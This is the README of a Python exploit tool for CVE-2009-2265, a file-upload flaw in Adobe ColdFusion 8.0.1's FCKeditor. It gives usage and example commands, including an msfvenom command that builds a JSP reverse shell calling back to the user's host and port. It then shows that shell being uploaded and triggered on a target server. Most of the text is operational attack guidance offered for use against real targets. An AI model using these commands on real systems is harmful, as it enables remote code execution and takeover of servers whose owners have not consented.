A Python 3 script to exploit CVE-2009-2265.
The script exploits a vulnerability in FCKeditor < 2.6.4.1, as shipped with Adobe ColdFusion 8.0.1:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265
The script lets the user upload a chosen file to a target running ColdFusion 8.0.1 and then request it so that it executes.
- python3
- the requests module for python3, which can be installed with:
    pip3 install requests
After identifying a target running Adobe ColdFusion 8.0.1, run the script with:
    chmod +x cf8-upload.py
    ./cf8-upload.py -h
or
    python3 cf8-upload.py -h
The -h or --help option shows how to run the script, with a few examples. There are two positional arguments and a few optional arguments.

    ./cf8-upload.py --help
    usage: cf8-upload.py [-h] [-a] [-n] [-r] address path

    ./cf8-upload.py exploits an LFI vulnerability in
    adobe coldfusion 8.0.1

    positional arguments:
      address           ip/hostname, port, sub-directories to the adobe
                        coldfusion 8.0.1 server
      path              path to file you wish to upload (eg.
                        '/path/to/file.txt')

    optional arguments:
      -h, --help        show this help message and exit
      -a, --accessible  turns off features which may negatively affect
                        screen readers
      -n, --no-colour   removes colour output
      -r, --request     request webpage after successfully uploading
                        file

    examples:
      ./cf8-upload.py 10.10.10.10 file.txt
      ./cf8-upload.py 10.10.10.10:8500 /path/to/reverse-shell.jsp -r
      ./cf8-upload.py hostname:8500/sub-dir /path/to/upload.zip -n
Adobe ColdFusion listens on port 8500 by default, but the full path to the server must be specified when executing the script.
A default installation of ColdFusion usually lives in the root directory on port 8500, in which case x.x.x.x:8500
will most likely suffice for the address argument.
By default, cf8-upload.py prints in colour and with some additional formatting to the terminal, which is not always helpful for those who use screen readers. The -a or --accessible
argument disables the fancy formatting and colour output. It also disables the ASCII art.
The -r or --request flag makes the script perform a GET request to the uploaded file, and only after it has been successfully uploaded. This is useful when the user is uploading a reverse shell of some kind to the vulnerable application and wishes to trigger it immediately. The body of the GET response is not printed to the terminal; the request only serves to trigger the file on the server.
Adobe ColdFusion is able to serve .jsp
files, so a reverse shell can be created with msfvenom
with something as simple as:
msfvenom -p java/jsp_shell_reverse_tcp lhost=[my ip] lport=[my listening port] -f raw > rshell.jsp
and uploaded:
./cf8-upload.py 10.10.10.10:8500 /path/to/rshell.jsp -r
The ColdFusion 8.0.1 application may not allow the exploit script to overwrite files that have already been uploaded. In that case, uploading a different file with the same name as a previously uploaded file may result in timeouts during the upload.
If that happens, rename the file you want to upload before attempting to upload it again.
The script was mainly an exercise in writing a short, comprehensive, self-contained program for a single exploit with both readability and accessibility in mind.
https://skerritt.blog/a11y/ - the accessibility implementation the script follows.